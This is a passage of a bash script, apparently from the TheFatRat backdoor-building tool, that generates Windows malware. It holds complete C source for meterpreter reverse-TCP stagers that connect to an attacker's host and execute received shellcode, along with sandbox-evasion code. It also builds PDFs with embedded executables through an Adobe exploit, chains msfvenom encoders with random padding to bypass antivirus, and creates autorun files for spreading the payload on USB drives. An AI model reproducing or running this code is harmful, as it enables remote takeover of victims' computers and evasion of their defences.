"\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 spinlong echo "" echo "" gboor spinlong echo "" $pwned $payload $yourip $yourport > /dev/null 2>&1 echo "" echo "" s0=$(cat powershell_attack.txt | cut -d ' ' -f1) s1=$(cat powershell_attack.txt | cut -d ' ' -f2) s2=$(cat powershell_attack.txt | cut -d ' ' -f3) s3=$(cat powershell_attack.txt | cut -d ' ' -f4) s4=$(cat powershell_attack.txt | cut -d ' ' -f5) sed s/PAYLOAD/$s0\ $s1\ $s2\ $s3\ $s4/g $B > $bcom echo dmcs $bcom -o "output/$fira.exe" > /dev/null 2>&1 rm unicorn.rc powershell_attack.txt $bcom sleep 2 echo "" echo -e $okegreen"" echo -e "Backdoor Saved To output Folder " elif test $fatrat1 == '3' #Apachecompler then echo "" echo -e $okegreen"" echo -e $okegreen " Starting Apache Server wait ..." service apache2 start > /dev/null 2>&1 echo "" echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" echo -ne " SET LHOST : ";tput sgr0 read yourip echo "" echo -ne $okegreen " SET LPORT : ";tput sgr0 read yourport echo "" echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0 read fira payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 spinlong echo "" echo "" gboor spinlong echo "" $pwned $payload $yourip $yourport > /dev/null 2>&1 echo "" echo $yourip >> "$out" s0=$(cat $out | cut -d ' ' -f1) sed s/SERVER/$s0/g $apache > $apachecom echo $COMPILER -Wall -mwindows icons/icon.res $apachecom -o "output/$fira.exe" > /dev/null 2>&1 rm unicorn.rc $apachecom $out mv powershell_attack.txt $apache2 sleep 2 echo "" echo -e $okegreen"" echo -e " Backdoor Saved To output Folder " echo "" echo -ne " Press any key to continue ......... " read continue elif test $fatrat1 == '4' #C AJA then echo "" echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" echo -ne " SET LHOST : ";tput sgr0 read yourip echo "" echo -ne $okegreen " SET LPORT : ";tput sgr0 read yourport echo "" echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0 read fira payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 spinlong echo "" echo "" gboor spinlong echo "" $pwned $payload $yourip $yourport > /dev/null 2>&1 echo "" echo "" s0=$(cat powershell_attack.txt | cut -d ' ' -f1) s1=$(cat powershell_attack.txt | cut -d ' ' -f2) s2=$(cat powershell_attack.txt | cut -d ' ' -f3) s3=$(cat powershell_attack.txt | cut -d ' ' -f4) s4=$(cat powershell_attack.txt | cut -d ' ' -f5) sed s/PAYLOAD/$s0\ $s1\ $s2\ $s3\ $s4/g $C > $paycom echo $COMPILER -Wall -mwindows icons/icon.res $paycom -o "output/$fira.exe" > /dev/null 2>&1 rm unicorn.rc powershell_attack.txt $paycom sleep 2 echo "" echo -e $okegreen"" echo -e " Backdoor Saved To output Folder " echo "" echo -ne " Press any key to continue ......... " read continue elif test $fatrat1 == '5' #PDF+POWERSHELL+C then echo echo -e $yellow" Worked on Adobe Reader v8.x, v9.x / Windows XP SP3 / Windows 7/Vista ( English )" echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" echo -ne " SET LHOST : ";tput sgr0 read yourip echo "" echo -ne $okegreen " SET LPORT : ";tput sgr0 read yourport echo "" echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0 read fira echo "" echo -ne $okegreen " Located Original PDF file for embed (example:/TheFatRat/PE/original.pdf) :" ;tput sgr0 read embedpdf payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 spinlong echo "" echo "" gboor spinlong echo "" $pwned $payload $yourip $yourport > /dev/null 2>&1 echo "" echo "" s0=$(cat powershell_attack.txt | cut -d ' ' -f1) s1=$(cat powershell_attack.txt | cut -d ' ' -f2) s2=$(cat powershell_attack.txt | cut -d ' ' -f3) s3=$(cat powershell_attack.txt | cut -d ' ' -f4) s4=$(cat powershell_attack.txt | cut -d ' ' -f5) sed s/PAYLOAD/$s0\ $s1\ $s2\ $s3\ $s4/g $C > $pdfcom echo $COMPILER -Wall -mwindows icons/icon.res $pdfcom -o "$path/output/backdoor_for_pdf.exe" > /dev/null 2>&1 sleep 2 echo " Wait for embed exe to pdf .... " xterm -T " TheFatRat < PDF BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use windows/fileformat/adobe_pdf_embedded_exe; set EXE::Custom $path/output/backdoor_for_pdf.exe; set FILENAME $fira.pdf; set INFILENAME $embedpdf; exploit; exit -y'" > /dev/null 2>&1 echo "" mv ~/.msf4/local/$fira.pdf $path/output/$fira.pdf rm unicorn.rc powershell_attack.txt echo -e $okegreen"" echo -e $yellow" Backdoor PDF Saved To output Folder " echo "" echo -ne $okegreen" Press any key to continue ......... " read continue elif test $fatrat1 == '6' #C Meteperter_reverse_tcp then echo "" echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" echo -ne " SET LHOST : ";tput sgr0 read yourip echo "" echo -ne $okegreen " SET LPORT : ";tput sgr0 read yourport echo "" echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0 read fira spinlong echo "" echo "" gboor spinlong echo "" echo '#include ' > $reverse1 echo '#include ' >> $reverse1 echo '#include ' >> $reverse1 echo '#include ' >> $reverse1 echo 'void winsock_init();' >> $reverse1 echo 'void Kick(SOCKET my_socket, char * error);' >> $reverse1 echo 'void genlol();' >> $reverse1 echo 'int recv_all(SOCKET my_socket, void * buffer, int len);' >> $reverse1 echo 'SOCKET wsconnect(char * targetip, int port);' >> $reverse1 echo 'int random_in_range (unsigned int min, unsigned int max);' >> $reverse1 echo 'char* rev(char* str);' >> $reverse1 echo 'int sandbox_evasion();' >> $reverse1 echo 'inline void reverse_tcp_meterpreter(char * listenerIP,unsigned int listenerPort);' >> $reverse1 echo 'void winsock_init() {' >> $reverse1 echo ' WSADATA wsaData;' >> $reverse1 echo ' WORD wVersionRequested;' >> $reverse1 echo ' wVersionRequested = MAKEWORD(2, 2);' >> $reverse1 echo ' if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> $reverse1 echo ' printf("ws2_32.dll is out of date.\n");' >> $reverse1 echo ' WSACleanup();' >> $reverse1 echo ' exit(1);' >> $reverse1 echo ' }' >> $reverse1 echo '}' >> $reverse1 echo 'void Kick(SOCKET my_socket, char * error) {' >> $reverse1 echo ' printf("error: %s\n", error);' >> $reverse1 echo ' closesocket(my_socket);' >> $reverse1 echo ' WSACleanup();' >> $reverse1 echo ' exit(1);' >> $reverse1 echo ' }' >> $reverse1 echo 'void genlol(){' >> $reverse1 echo ' int num1, num2, num3;' >> $reverse1 echo ' num1=100;' >> $reverse1 echo ' while (num1<=5) {' >> $reverse1 echo ' num1=random_in_range(0,10000);' >> $reverse1 echo ' num2=random_in_range(0,10000);' >> $reverse1 echo ' num3=random_in_range(0,10000);' >> $reverse1 echo ' }' >> $reverse1 echo '}' >> $reverse1 echo 'int recv_all(SOCKET my_socket, void * buffer, int len) {' >> $reverse1 echo ' int tret = 0;' >> $reverse1 echo ' int nret = 0;' >> $reverse1 echo ' void * startb = buffer;' >> $reverse1 echo ' while (tret < len) {' >> $reverse1 echo ' nret = recv(my_socket, (char *)startb, len - tret, 0);' >> $reverse1 echo ' startb += nret;' >> $reverse1 echo ' tret += nret;' >> $reverse1 echo ' if (nret == SOCKET_ERROR)' >> $reverse1 echo ' Kick(my_socket, "Could not receive data");' >> $reverse1 echo ' }' >> $reverse1 echo ' return tret;' >> $reverse1 echo '}' >> $reverse1 echo 'SOCKET wsconnect(char * targetip, int port) {' >> $reverse1 echo ' struct hostent * target;' >> $reverse1 echo ' struct sockaddr_in sock;' >> $reverse1 echo ' SOCKET my_socket;' >> $reverse1 echo ' my_socket = socket(AF_INET, SOCK_STREAM, 0);' >> $reverse1 echo ' if (my_socket == INVALID_SOCKET)' >> $reverse1 echo ' Kick(my_socket, "Cannot initialize socket");' >> $reverse1 echo ' target = gethostbyname(targetip);' >> $reverse1 echo ' if (target == NULL)' >> $reverse1 echo ' Kick(my_socket, "cannot resolve target");' >> $reverse1 echo ' memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);' >> $reverse1 echo ' sock.sin_family = AF_INET;' >> $reverse1 echo ' sock.sin_port = htons(port);' >> $reverse1 echo ' if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )' >> $reverse1 echo ' Kick(my_socket, "Could not connect");' >> $reverse1 echo ' return my_socket;' >> $reverse1 echo '}' >> $reverse1 echo 'int random_in_range (unsigned int min, unsigned int max)' >> $reverse1 echo '{' >> $reverse1 echo ' int base_random = rand(); ' >> $reverse1 echo ' if (RAND_MAX == base_random){' >> $reverse1 echo ' return random_in_range(min, max);' >> $reverse1 echo ' }' >> $reverse1 echo ' int range = max - min,' >> $reverse1 echo ' remainder = RAND_MAX % range,' >> $reverse1 echo ' bucket = RAND_MAX / range;' >> $reverse1 echo ' if (base_random < RAND_MAX - remainder) {' >> $reverse1 echo ' return min + base_random/bucket;' >> $reverse1 echo ' } else {' >> $reverse1 echo ' return random_in_range (min, max);' >> $reverse1 echo ' }' >> $reverse1 echo '}' >> $reverse1 echo 'char* rev(char* str)' >> $reverse1 echo '{' >> $reverse1 echo ' int end=strlen(str)-1;' >> $reverse1 echo ' int i;' >> $reverse1 echo ' for(i=5; i> $reverse1 echo ' {' >> $reverse1 echo ' str[i] ^= 1;' >> $reverse1 echo ' }' >> $reverse1 echo ' return str;' >> $reverse1 echo '}' >> $reverse1 echo 'int sandbox_evasion(){' >> $reverse1 echo ' MSG msg;' >> $reverse1 echo ' DWORD tc;' >> $reverse1 echo ' PostThreadMessage(GetCurrentThreadId(), WM_USER + 2, 23, 42);' >> $reverse1 echo ' if (!PeekMessage(&msg, (HWND)-1, 0, 0, 0))' >> $reverse1 echo ' return -1;' >> $reverse1 echo ' if (msg.message != WM_USER+2 || msg.wParam != 23 || msg.lParam != 42)' >> $reverse1 echo ' return -1;' >> $reverse1 echo ' tc = GetTickCount();' >> $reverse1 echo ' Sleep(650);' >> $reverse1 echo ' if (((GetTickCount() - tc) / 300) != 2)' >> $reverse1 echo ' return -1;' >> $reverse1 echo ' return 0;' >> $reverse1 echo '}' >> $reverse1 echo 'void reverse_tcp_meterpreter(char * listenerIP,unsigned int listenerPort){' >> $reverse1 echo ' ULONG32 size;' >> $reverse1 echo ' char * buffer;' >> $reverse1 echo ' void (*function)();' >> $reverse1 echo ' winsock_init();' >> $reverse1 echo ' SOCKET my_socket = wsconnect(listenerIP, listenerPort);' >> $reverse1 echo ' int count = recv(my_socket, (char *)&size, 4, 0);' >> $reverse1 echo ' if (count != 4 || size <= 0)' >> $reverse1 echo ' Kick(my_socket, "bad length value\n");' >> $reverse1 echo ' genlol();' >> $reverse1 echo ' buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);' >> $reverse1 echo ' genlol();' >> $reverse1 echo ' if (buffer == NULL)' >> $reverse1 echo ' Kick(my_socket, "bad buffer\n");' >> $reverse1 echo ' buffer[0] = 0xBF;' >> $reverse1 echo ' genlol();' >> $reverse1 echo ' memcpy(buffer + 1, &my_socket, 4);' >> $reverse1 echo ' genlol();' >> $reverse1 echo ' count = recv_all(my_socket, buffer + 5, size);' >> $reverse1 echo ' function = (void (*)())buffer;' >> $reverse1 echo ' function();' >> $reverse1 echo '}' >> $reverse1 echo 'void reverse_tcp_meterpreter_x64(char * listenerIP,unsigned int listenerPort){' >> $reverse1 echo ' ULONG32 size;' >> $reverse1 echo ' char * buffer;' >> $reverse1 echo ' void (*function)();' >> $reverse1 echo ' winsock_init();' >> $reverse1 echo ' SOCKET my_socket = wsconnect(listenerIP, listenerPort);' >> $reverse1 echo ' int count = recv(my_socket, (char *)&size, 4, 0);' >> $reverse1 echo ' if (count != 4 || size <= 0)' >> $reverse1 echo ' Kick(my_socket, "bad length value\n");' >> $reverse1 echo ' genlol();' >> $reverse1 echo ' buffer = VirtualAlloc(0, size + 10, MEM_COMMIT, PAGE_EXECUTE_READWRITE);' >> $reverse1 echo ' genlol();' >> $reverse1 echo ' if (buffer == NULL)' >> $reverse1 echo ' Kick(my_socket, "bad buffer\n");' >> $reverse1 echo ' buffer[0] = 0x48;' >> $reverse1 echo ' buffer[1] = 0xBF;' >> $reverse1 echo ' genlol();' >> $reverse1 echo ' memcpy(buffer + 2, &my_socket, 8);' >> $reverse1 echo ' genlol();' >> $reverse1 echo ' count = recv_all(my_socket, buffer + 10, size);' >> $reverse1 echo ' function = (void (*)())buffer;' >> $reverse1 echo ' function();' >> $reverse1 echo '}' >> $reverse1 echo 'int main(int argc, char *argv[]) {' >> $reverse1 echo -n 'char * defaultListenerIP = "' >> $reverse1 echo -n $yourip >> $reverse1 echo -n '";' >> $reverse1 echo '' >> $reverse1 echo -n 'unsigned int defaultListenerPort = ' >> $reverse1 echo -n $yourport >> $reverse1 echo -n ';' >> $reverse1 echo '' >> $reverse1 echo ' sandbox_evasion();' >> $reverse1 echo ' if(argc == 3){' >> $reverse1 echo ' #ifdef ISX64' >> $reverse1 echo ' reverse_tcp_meterpreter_x64(argv[1], atoi(argv[2]));' >> $reverse1 echo ' #else' >> $reverse1 echo ' reverse_tcp_meterpreter_x64(argv[1], atoi(argv[2]));' >> $reverse1 echo ' #endif' >> $reverse1 echo ' }else{' >> $reverse1 echo ' #ifdef ISX64' >> $reverse1 echo ' reverse_tcp_meterpreter_x64(defaultListenerIP, defaultListenerPort);' >> $reverse1 echo ' #else' >> $reverse1 echo ' reverse_tcp_meterpreter_x64(defaultListenerIP, defaultListenerPort);' >> $reverse1 echo ' #endif' >> $reverse1 echo ' }' >> $reverse1 echo ' return 0;' >> $reverse1 echo '}' >> $reverse1 $COMPILER $reverse1 -o output/$fira.exe -lws2_32 -mwindows echo echo -e $yellow " [+]"$okegreen"Compiling Binary Done ";tput sgr0 rm $reverse1 echo -ne $yellow " Press Enter key to Contiune ..." read aw PwnWinds elif test $fatrat1 == '7' #C Staging Protocol Meteperter then echo "" echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" echo -ne " SET LHOST : ";tput sgr0 read yourip echo "" echo -ne $okegreen " SET LPORT : ";tput sgr0 read yourport echo "" echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0 read fira spinlong echo "" echo "" gboor spinlong echo "" echo '#include '> $stag echo '#include ' >> $stag echo '#include ' >> $stag echo '#include ' >> $stag echo -n 'unsigned char server[]="' >> $stag echo -n $yourip >> $stag echo -n '";' >> $stag echo '' >> $stag echo -n 'unsigned char serverp[]="' >> $stag echo -n $yourport >> $stag echo -n '";' >> $stag echo '' >> $stag echo 'void winsock_init() {' >> $stag echo ' WSADATA wsaData;' >> $stag echo ' WORD wVersionRequested;' >> $stag echo ' wVersionRequested = MAKEWORD(2, 2);'>> $stag echo ' if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> $stag echo ' printf("ws2_32.dll is out of date.\n"); '>> $stag echo ' WSACleanup(); '>> $stag echo ' exit(1);'>> $stag echo ' }' >> $stag echo ' }' >> $stag echo ' void punt(SOCKET my_socket, char * error) {' >> $stag echo ' printf("Bad things: %s\n", error);'>> $stag echo ' closesocket(my_socket);'>> $stag echo ' WSACleanup();'>> $stag echo ' exit(1);' >> $stag echo ' }' >> $stag echo ' int recv_all(SOCKET my_socket, void * buffer, int len) {' >> $stag echo ' int tret = 0;'>> $stag echo ' int nret = 0;'>>$stag echo ' void * startb = buffer;'>> $stag echo ' while (tret < len) {'>>$stag echo ' nret = recv(my_socket, (char *)startb, len - tret, 0);'>> $stag echo ' startb += nret;'>> $stag echo ' tret += nret;'>>$stag echo ' if (nret == SOCKET_ERROR)'>> $stag echo ' punt(my_socket, "Could not receive data");'>> $stag echo ' }'>>$stag echo ' return tret;'>> $stag echo '}' >> $stag echo 'SOCKET wsconnect(char * targetip, int port) {'>> $stag echo ' struct hostent * target;' >> $stag echo ' struct sockaddr_in sock;' >> $stag echo ' SOCKET my_socket;'>>$stag echo ' my_socket = socket(AF_INET, SOCK_STREAM, 0);'>> $stag echo ' if (my_socket == INVALID_SOCKET)'>> $stag echo ' punt(my_socket, ".");'>>$stag echo ' target = gethostbyname(targetip);'>>$stag echo ' if (target == NULL)'>>$stag echo ' punt(my_socket, "..");'>>$stag echo ' memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);'>>$stag echo ' sock.sin_family = AF_INET;'>> $stag echo ' sock.sin_port = htons(port);'>>$stag echo ' if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )'>>$stag echo ' punt(my_socket, "...");'>>$stag echo ' return my_socket;'>>$stag echo '}' >> $stag echo 'int main(int argc, char * argv[]) {' >> $stag echo ' FreeConsole();'>>$stag echo ' ULONG32 size;'>>$stag echo ' char * buffer;'>>$stag echo ' void (*function)();'>>$stag echo ' winsock_init();'>> $stag echo ' SOCKET my_socket = wsconnect(server, atoi(serverp));'>>$stag echo ' int count = recv(my_socket, (char *)&size, 4, 0);'>>$stag echo ' if (count != 4 || size <= 0)'>>$stag echo ' punt(my_socket, "read a strange or incomplete length value\n");'>>$stag echo ' buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);'>>$stag echo ' if (buffer == NULL)'>>$stag echo ' punt(my_socket, "could not allocate buffer\n");'>>$stag echo ' buffer[0] = 0xBF;'>>$stag echo ' memcpy(buffer + 1, &my_socket, 4);'>>$stag echo ' count = recv_all(my_socket, buffer + 5, size);'>>$stag echo ' function = (void (*)())buffer;'>>$stag echo ' function();'>>$stag echo ' return 0;'>>$stag echo '}' >> $stag $COMPILER $stag -o output/$fira.exe -lws2_32 echo echo -e $yellow " [+]"$okegreen"Compiling Binary Done ";tput sgr0 rm $stag echo -ne $yellow " Press Enter key to Contiune ..." read aw PwnWinds elif test $fatrat1 == '8' then clear menu else echo -e " Incorrect Number" fi echo "" echo -n -e $yellow " Do you want exit? ( Yes / No ) : " read back if [ $back != 'n' ] && [ $back != 'N' ] then clear exit elif [ $back != 'y' ] && [ $back != 'Y' ] then PwnWinds fi } ########################################### MENU AVOID ############################################################ # #recoded AVOID ( AV0id - Metapsloit Payload Anti-Virus Evasion ) to next version - Screetsec ( Edo -maland ) #Released as open source by NCC Group Plc - http://www.nccgroup.com/ #Developed or original code by Daniel Compton, daniel dot compton at nccgroup dot com #Removed Deprecated Commands in favor of MsfVenom by Jason Soto www.jsitech.com #Credit to other A.V. scripts and research by Astr0baby, Vanish3r & Hasan aka inf0g33k , Screetsec # ################################################################################################################ function avoid { clear # User options PAYLOAD="windows/meterpreter/reverse_tcp" # The payload to use MSFVENOM="$msfvenom" # Path to the msfvenom script MSFCONSOLE="$msfconsole" # Path to the msfconsole script #Checking [[ `id -u` -eq 0 ]] || { echo -e "\e[31mMust be root to run script"; exit 1; } resize -s 36 73 > /dev/null clear SERVICE=service; #Checking Version VERSION="2.1" # spinner for Metasploit Generator spinlong () { bar=" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ " barlength=${#bar} i=0 while ((i < 100)); do n=$((i*barlength / 100)) printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}" ((i += RANDOM%5+2)) sleep 0.02 done } # spinner for random seed generator spinlong2 () { bar=" 01100111001001001110111001101010101010110101001010111001010101010101010" barlength=${#bar} i=0 while ((i < 100)); do n=$((i*barlength / 100)) printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}" ((i += RANDOM%5+2)) sleep 0.02 done } clear #MENU INTI echo "" echo -e $cyan"========================================================================" echo -e $okegreen" METASPLOIT SHELL A.V. FOR BYPASS AV THIS VERSION $VERSION " echo -e $cyan"========================================================================" echo -e $red"" echo " " echo " ..:::::::::.. " echo " ..:::aad8888888baa:::.. " echo " .::::d:?88888888888?::8b::::. " echo " .:::d8888:?88888888??a888888b:::. " echo " .:::d8888888a8888888aa8888888888b:::. " echo " ::::dP::::::::88888888888::::::::Yb:::: " echo " ::::dP:::::::::Y888888888P:::::::::Yb:::: " echo " ::::d8:::::::::::Y8888888P:::::::::::8b:::: " echo " .::::88::::::::::::Y88888P::::::::::::88::::. " echo " :::::Y8baaaaaaaaaa88P:T:Y88aaaaaaaaaad8P::::: " echo " :::::::Y88888888888P::|::Y88888888888P::::::: " echo " ::::::::::::::::888:::|:::888:::::::::::::::: " echo " :::::::::::::::8888888888888b:::::::::::::: " echo " :::::::::::::::88888888888888:::::::::::::: " echo " :::::::::::::d88888888888888::::::::::::: " echo " ::::::::::::88::88::88:::88:::::::::::: " echo " ::::::::::88::88::88:::88:::::::::: " echo " ::::::::88::88::P::::88:::::::: " echo " ::::::88::88:::::::88:::::: " echo " ::::::::::::::::::: " echo " ::::::::: " echo "" echo -e -$cyan " REMAKE:$red "Screetsec" $cyan( Edo -maland- ) " echo -e " OPEN SOURCE : $red "NCC Group Plc" $cyan( http://www.nccgroup.com ) " echo -e " DEVELOPED : $red Daniel Compton, daniel dot compton at nccgroup dot com " echo -e $cyan"========================================================================" echo -e $okegreen" METASPLOIT SHELL A.V. FOR BYPASS AV THIS VERSION $VERSION " echo -e $cyan"========================================================================" echo -e $cyan"" # Set Output filename echo echo -n -e "TYPE THE DESIRED OUTPUT FILENAME : $okegreen" ; read OUTPUTNAME echo "" echo "" echo -n -e $cyan"TYPE THE DESIRED LABEL FOR THE AUTORUN FILES : $okegreen" ; read LABEL echo "" #Check for Metasploit if [[ "$MSFVENOM" != "" || "$MSFCONSOLE" != "" ]]; then echo "" else echo "" echo -e "\e[01;31m[!]\e[00m Unable to find the required Metasploit program, cant continue. Install and try again" echo -e "\e[01;31m[!]\e[00m If msfpayload, msfencode and msfcli are not in your PATH, edit this script options" echo "" exit 1 fi # Random Msfencode encoding iterations #ITER=`seq 5 10 |sort -R |sort -R | head -1` ITER=`shuf -i 10-20 -n 1` echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" echo -ne $cyan"TYPE YOUR LHOST : $okegreen" ; read IP echo "" echo "" echo -ne $cyan"TYPE YOUR LPORT : $okegreen" ; read PORT echo "" echo "" echo "" echo -e "\e[01;32m[-]\e[00m Generating Metasploit payload, please wait..." echo "" echo "" spinlong #Payload creater $MSFVENOM -p "$PAYLOAD" LHOST="$IP" LPORT="$PORT" EXITFUNC=thread -f raw | $MSFVENOM -e x86/shikata_ga_nai -i $ITER -f raw 2>/dev/null | $MSFVENOM -e x86/jmp_call_additive -i $ITER -a x86 --platform linux -f raw 2>/dev/null | $MSFVENOM -e x86/call4_dword_xor -i $ITER -a x86 --platform win -f raw 2>/dev/null | $MSFVENOM -e x86/shikata_ga_nai -i $ITER -a x86 --platform win -f c > msf.c 2>/dev/null echo "" echo "" # ANOTHER MENU clear echo " " echo -e $cyan"==================================================================" echo -e $okegreen" __ _ _ __ " echo " / _|_ _ ___| | ___ _ ___ _ _ _ __ ___ ___| |/ _| " echo " | |_| | | |/ __| |/ / | | |/ _ \| | | | '__/ __|/ _ \ | |_ " echo " | _| |_| | (__| <| |_| | (_) | |_| | | \__ \ __/ | _| " echo " |_| \____|\___|_|\_\\___ |\___/ \____|_| |___/\___|_|_| " echo " |___/ " echo -e $cyan"==================================================================" echo -e $red"" echo -e $okegreen" |||||||||||||| " echo -e $red" = \ " echo " = | " echo " _= ___/ " echo -e " / _\ ($okegreen"o"$red)\ " echo " | | \ _ \ " echo " | |/ (____) " echo " \__/ / | " echo " / / ___) " echo -e " / \ \ _) $okegreen ) " echo -e $red" \ \ / $okegreen TheFatRat $okegreen ( " echo -e $red" \/ \ \_________/ |\___________________ $okegreen ) " echo -e $red" \/ \ / | $okegreen"===="$red _______)__) " echo -e " \/ \ / __/___ $okegreen"===="$red _/ " echo -e " \/ \ / ($okegreen"O"$red ____)\\_(_/ " echo -e " ($okegreen"O"$red _ ____) " echo -e " ($okegreen"O"$red ____) " echo "" echo -e $cyan"================================================================= " echo "" echo -e $okegreen"" echo " 1. Normal [ 400K payload ] - [ fast compile ] " echo "" echo " 2. Stealth [ 1-2 MB payload ] - [ fast compile ] " echo "" echo " 3. Super Stealth - [ 10-20MB payload ] " echo "" echo " 4. Insane Stealth - [ 50MB payload ] " echo "" echo " 5. Desperate Stealth - [ 100MB payload ] " echo "" echo -ne $cyan "TYPE THE NUMBER IF YOU WANT : " ; read LEVEL echo "" if [ "$LEVEL" = "1" ]; then echo "" echo -e "\e[01;32m[-]\e[00m Normal selected, please wait a few seconds" echo "" echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait" echo "" spinlong2 SEED=$(shuf -i 100000-500000 -n 1) elif [ "$LEVEL" = "2" ]; then echo "" echo -e "\e[01;32m[-]\e[00m Stealth selected, please wait a few seconds" echo "" echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait" echo "" spinlong2 SEED=$(shuf -i 1000000-5000000 -n 1) elif [ "$LEVEL" = "3" ]; then echo "" echo -e "\e[01;32m[-]\e[00m Super Stealth selected, please wait a few seconds" echo "" echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait" echo "" spinlong2 SEED=$(shuf -i 8000000-12000000 -n 1) elif [ "$LEVEL" = "4" ]; then echo "" echo -e "\e[01;32m[-]\e[00m Insane Stealth selected, please wait a few minutes" echo "" echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait" echo "" spinlong2 SEED=$(shuf -i 40000000-60000000 -n 1) elif [ "$LEVEL" = "5" ]; then echo "" echo -e "\e[01;32m[-]\e[00m Desperate Stealth selected, please wait a few minutes" echo "" echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait" echo "" spinlong2 SEED=$(shuf -i 100000000-200000000 -n 1) else echo -e "\e[01;31m[!]\e[00m You didnt select a option, exiting" echo "" exit 1 fi # build the c file ready for compile echo "" echo '#include ' >> build.c echo 'unsigned char padding[]=' >> build.c cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c$SEED > random sed -i 's/$/"/' random sed -i 's/^/"/' random cat random >> build.c echo ';' >> build.c echo 'char payload[] =' >> build.c cat msf.c |grep -v "unsigned" >> build.c echo 'char comment[512] = "";' >> build.c echo 'int main(int argc, char **argv) {' >> build.c echo ' (*(void (*)()) payload)();' >> build.c echo ' return(0);' >> build.c echo '}' >> build.c # gcc compile the exploit ls icons/icon.res >/dev/null 2>&1 if [ $? -eq 0 ]; then $COMPILER -Wall -mwindows icons/icon.res build.c -o "$OUTPUTNAME" else $COMPILER -Wall -mwindows build.c -o "$OUTPUTNAME" fi # check if file built correctly LOCATED=`pwd` ls "$OUTPUTNAME" >/dev/null 2>&1 if [ $? -eq 0 ]; then echo "" echo -e "\e[01;32m[+]\e[00m Your payload has been successfully created and is located here: \e[01;32m"$LOCATED"/"$OUTPUTNAME"\e[00m" else echo "" echo -e "\e[01;31m[!]\e[00m Something went wrong trying to compile the executable, exiting" echo "" exit 1 fi # create autorun files mkdir autorun >/dev/null 2>&1 cp "$OUTPUTNAME" autorun/ >/dev/null 2>&1 cp icons/autorun.ico autorun/ >/dev/null 2>&1 echo "[autorun]" > autorun/autorun.inf echo "open="$OUTPUTNAME"" >> autorun/autorun.inf echo "icon=autorun.ico" >> autorun/autorun.inf echo "label="$LABEL"" >> autorun/autorun.inf echo "" echo -e "\e[01;32m[+]\e[00m I have also created 3 AutoRun files here: \e[01;32m"$LOCATED"/"autorun/"\e[00m - simply copy these files to a CD or USB" # clean up temp files rm build.c >/dev/null 2>&1 rm random >/dev/null 2>&1 rm msf.c >/dev/null 2>&1 rm msfhandler.rc >/dev/null 2>&1 echo -n -e $okegreen"Do you want exit? ( Yes / No ) : " read back if [ $back != 'n' ] && [ $back != 'N' ] then clear exit elif [ $back != 'y' ] && [ $back != 'Y' ] then menu fi } #### credits function credits { clear echo -e " \033[31m##########################################################################\033[m Credits To \033[31m##########################################################################\033[m" echo echo 